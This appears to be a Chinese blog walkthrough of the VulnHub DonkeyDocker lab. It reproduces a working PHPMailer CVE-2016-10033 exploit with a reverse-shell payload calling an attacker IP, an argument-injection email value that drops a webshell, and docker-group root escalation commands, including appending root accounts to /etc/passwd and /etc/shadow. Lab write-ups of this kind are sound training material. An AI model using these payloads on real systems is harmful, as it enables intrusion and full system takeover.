DonkeyDocker-v1-0渗透思路

MY_BLOG

https://xyaxxya.github.io/2024/04/13/DonkeyDocker-v1-0渗透思路/


date: 2024-04-13 19:15:10
tags:

  • 内网渗透
  • Dockerfile

categories:

    • 内网渗透
    • vulnhub

靶机下载地址

https://www.vulnhub.com/entry/donkeydocker-1,189/

靶机IP:

192.168.100.134

查看端口,扫描目录

查看页面

刚才用的是

feroxbuster -u http://192.168.100.134

不太给力,换个字典再看看

+ http://192.168.100.134/mailer/extras/admin.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/extras/index.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/extras/info.php (CODE:301|SIZE:330)
+ http://192.168.100.134/mailer/extras/phpinfo.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/extras/xmlrpc.php (CODE:301|SIZE:332)
+ http://192.168.100.134/mailer/extras/xmlrpc_server.php (CODE:301|SIZE:339)

---- Entering directory: http://192.168.100.134/mailer/language/ ----
+ http://192.168.100.134/mailer/language/admin.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/language/index.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/language/info.php (CODE:301|SIZE:332)
+ http://192.168.100.134/mailer/language/phpinfo.php (CODE:301|SIZE:335)
+ http://192.168.100.134/mailer/language/xmlrpc.php (CODE:301|SIZE:334)
+ http://192.168.100.134/mailer/language/xmlrpc_server.php (CODE:301|SIZE:341)

---- Entering directory: http://192.168.100.134/mailer/test/ ----
+ http://192.168.100.134/mailer/test/admin.php (CODE:301|SIZE:329)
+ http://192.168.100.134/mailer/test/index.php (CODE:301|SIZE:329)
+ http://192.168.100.134/mailer/test/info.php (CODE:301|SIZE:328)
+ http://192.168.100.134/mailer/test/phpinfo.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/test/xmlrpc.php (CODE:301|SIZE:330)
+ http://192.168.100.134/mailer/test/xmlrpc_server.php (CODE:301|SIZE:337)

---- Entering directory: http://192.168.100.134/mailer/examples/images/ ----
+ http://192.168.100.134/mailer/examples/images/admin.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/images/index.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/images/info.php (CODE:301|SIZE:339)
+ http://192.168.100.134/mailer/examples/images/phpinfo.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/images/xmlrpc.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/images/xmlrpc_server.php (CODE:301|SIZE:348)

---- Entering directory: http://192.168.100.134/mailer/examples/scripts/ ----
+ http://192.168.100.134/mailer/examples/scripts/admin.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/scripts/index.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/scripts/info.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/scripts/phpinfo.php (CODE:301|SIZE:343)
+ http://192.168.100.134/mailer/examples/scripts/xmlrpc.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/scripts/xmlrpc_server.php (CODE:301|SIZE:349)

---- Entering directory: http://192.168.100.134/mailer/examples/styles/ ----
+ http://192.168.100.134/mailer/examples/styles/admin.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/styles/index.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/styles/info.php (CODE:301|SIZE:339)
+ http://192.168.100.134/mailer/examples/styles/phpinfo.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/styles/xmlrpc.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/styles/xmlrpc_server.php (CODE:301|SIZE:348)

-----------------
END_TIME: Sat Apr 13 07:32:54 2024
DOWNLOADED: 73792 - FOUND: 103

选择http://192.168.100.134/mailer/examples/登录

登录http://192.168.100.134/mailer/examples/查看

google一下发现http://192.168.100.134/mailer/VERSION可以查询版本

google一下

https://exploit-db.com/exploits/40974

"""
# 漏洞标题:PHPMailer 漏洞 v1.0
# 日期:2016 年 12 月 29 日
# 利用作者:Daniel aka anarc0der
# 版本:PHPMailer < 5.2.18
# 测试环境:Arch Linux
# CVE:CVE 2016-10033

描述:
通过目标的反向连接(反向 shell)来利用 PHPMail

用法:
1 - 下载 docker 易受攻击的环境:https://github.com/opsxcq/exploit-CVE-2016-10033
2 - 在有效负载变量上配置反向 shell 的 IP
4 - 在一个终端中打开 nc 监听器: $ nc -lnvp <your ip>
3 - 打开其他终端并运行漏洞利用程序:python3 anarcoder.py

视频 PoC:https://www.youtube.com/watch?v=DXeZxKr-qsU

完整咨询:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec

下载代码后修改:

  1. 打开文件并在开头添加" #coding:utf-8 "。
  2. 设置target = 'http://192.168.100.134' (受害者IP) ,这是backdoor.php在受害者机器中自动上传的位置。
  3. 在有效负载代码中提供攻击者 IP:192.168.100.251(Kali Linux IP)
  4. 进行上述更改后保存。

然后pip2 install requests_toolbelt

一边监听一边运行即可

或者msf里也有脚本

msf6 > searchsploit phpmail
[*] exec: searchsploit phpmail

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service                                                                                     | php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution                                                                                            | php/webapps/40968.sh
PHPMailer < 5.2.18 - Remote Code Execution                                                                                            | php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution                                                                                            | php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)                                                                         | multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution                                                                                            | php/webapps/40969.py
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution        | php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                                                              | php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure                                                                                            | php/webapps/43056.py
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)                                                           | php/remote/42024.rb
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

下载到当前页面

#coding:utf-8
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh

os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://192.168.100.134'
backdoor = '/test.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.100.251\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/test.php server\" @protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': '192.168.100.251', 'https':'192.168.100.251'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)

实验后发现target中不需要添加contact界面,这样添加的webshell就会在IP/backdoor.php

至于proxy需不需要修改,我没试过

test是我自己测试用的

运行后访问backdoor.php即可反弹shell

/bin/sh: 0: can't access tty; job control turned off

返回netcat shell,在这里会发现它已连接到受害者,但无法访问受害者系统的正确 shell,因此,输入给定的命令以便正确访问受害者 shell

python升级shell

python -c 'import pty;pty.spawn("/bin/bash")'

先看看有suid权限的

没什么收获

在根目录发现main.sh

# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf

sleep 3
tail -f /var/log/apache2/*&

# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25

www-data@12081bd067cc:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
smmta:x:104:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:105:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
smith:x:1000:100::/home/smith:/bin/bash

发现Smith,尝试登录,弱口令进了

用户目录发现一个flag

似乎是指向orwell@donkeydocker 的私钥。

复制到id_rsa登录

详见https://wangdoc.com/ssh/key

chmod 600 id_rsa
ssh -i id_rsa orwell@192.168.100.134 

获得第二个flag

属于docker组,列出所有容器。这下知道main.sh的作用了吧

#!/bin/bash

# change permission
chown smith:users /home/smith/flag.txt

# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf

sleep 3
tail -f /var/log/apache2/*&

# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25

法一:

docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'

简单的说就是新建了一个debian容器,其中的hack目录映射到本地的root目录,-c后面跟随的字符串是要在 Shell 中执行的命令。

debian 是镜像的名称,jessie 是 Debian 发行版的一个老版本的代号,作为镜像的标签,Docker 将使用这个镜像来创建容器。

法二(no flag)

我们在shell端创建一个软连接到/etc/psswd

cd /home/smith
mv flag.txt flag.txt.bak
ln -s /etc/passwd flag.txt

ssh端重启docker

会杀死原来的会话,重新创建即可

创建root用户即可

www-data@12081bd067cc:/www$ echo 'yiyi:x:0:0::/root:/bin/bash' >> flag.txt
echo 'yiyi:x:0:0::/root:/bin/bash' >> flag.txt

同样的操作对shadow

rm flag.txt
ln -s /etc/shadow flag.txt

重启docker

echo 'reedphish:R2JhrPXIXqW3g:17251:0:99999:7:::' >> flag.txt

su yiyi
ls -al /root

密码smith

登录后发现找不到flag!

法三

类法一

创建一个hack目录,在里面写dockerfile

touch Dockerfile

Dockerfile内容

FROM alpine:3.3 
# Alpine is nice! 
ENV WORKDIR /hack
RUN mkdir -p $WORKDIR
VOLUME [$WORKDIR]
WORKDIR $WORKDIR

构建

docker build -t hackerimage .
docker run -v /root:/hack -t hackerimage /bin/sh -c 'ls -la'
docker run -v /root:/hack -t hackerimage /bin/sh -c 'cat flag.txt'

相关推荐
Red Red4 小时前
网安基础知识|IDS入侵检测系统|IPS入侵防御系统|堡垒机|VPN|EDR|CC防御|云安全-VDC/VPC|安全服务
网络·笔记·学习·安全·web安全
2401_857610035 小时前
SpringBoot社团管理:安全与维护
spring boot·后端·安全
Natural_yz6 小时前
大数据学习17之Spark-Core
大数据·学习·spark
qq_172805596 小时前
RUST学习教程-安装教程
开发语言·学习·rust·安装
一只小小汤圆6 小时前
opencascade源码学习之BRepOffsetAPI包 -BRepOffsetAPI_DraftAngle
c++·学习·opencascade
虾球xz6 小时前
游戏引擎学习第20天
前端·学习·游戏引擎
LateBloomer7776 小时前
FreeRTOS——信号量
笔记·stm32·学习·freertos
legend_jz6 小时前
【Linux】线程控制
linux·服务器·开发语言·c++·笔记·学习·学习方法
Komorebi.py6 小时前
【Linux】-学习笔记04
linux·笔记·学习
弗锐土豆7 小时前
工业生产安全-安全帽第二篇-用java语言看看opencv实现的目标检测使用过程
java·opencv·安全·检测·面部